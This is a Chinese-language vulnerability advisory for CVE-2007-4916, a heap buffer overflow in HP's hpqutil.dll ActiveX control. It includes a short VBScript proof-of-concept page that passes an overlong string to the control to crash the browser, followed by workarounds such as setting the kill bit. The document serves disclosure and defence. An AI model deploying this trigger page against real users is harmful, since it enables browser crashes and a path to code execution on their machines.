发布日期：2007-09-14
更新日期：2007-09-17

受影响系统：

HP hpqutil.dll 2.0.0.138

描述：

---

BUGTRAQ  ID: 25673
CVE(CAN) ID: CVE-2007-4916

hpqutil.dll是HP多功能一体机和Photo/Image Gallery等打印机产品随机软件中所提供的函数库。

hpqutil.dll ActiveX控件的实现上存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制客户端系统。

hpqutil.dll ActiveX控件中的FindFile()函数没有正确地验证对lstrcpyA()的调用，该dll分配了320字节的缓冲区，因此如果用户受骗访问了恶意网页并传送了超长参数的话，就可以触发堆溢出，导致浏览器崩溃或执行任意指令。

<*来源：Brian Mariani （bmariani@shellcode.com.ar）
        Jonathan Sarba （sarbaj@shellcode.com.ar）
  
  链接：http://marc.info/?l=bugtraq&m=118979173018182&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

[...]
<object classid='clsid:F3F381A3-4795-41FF-8190-7AA2A8102F85' id='pAF'>
</object>
<input type="button" value="heap" language="VBScript" OnClick="OuCh()">
<script language="VBScript">
sub OuCh()
Var_0 = String(620, "A")
pAF.ListFiles Var_0
End Sub
</script>
[...]

建议：

---

临时解决方法：

* 使用regsvr32注销hpqutil.dll
* 为clsid F3F381A3-4795-41FF-8190-7AA2A8102F85设置kill bit

厂商补丁：

HP
--
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://itrc.hp.com

浏览次数：2388
严重程度：0（网友投票）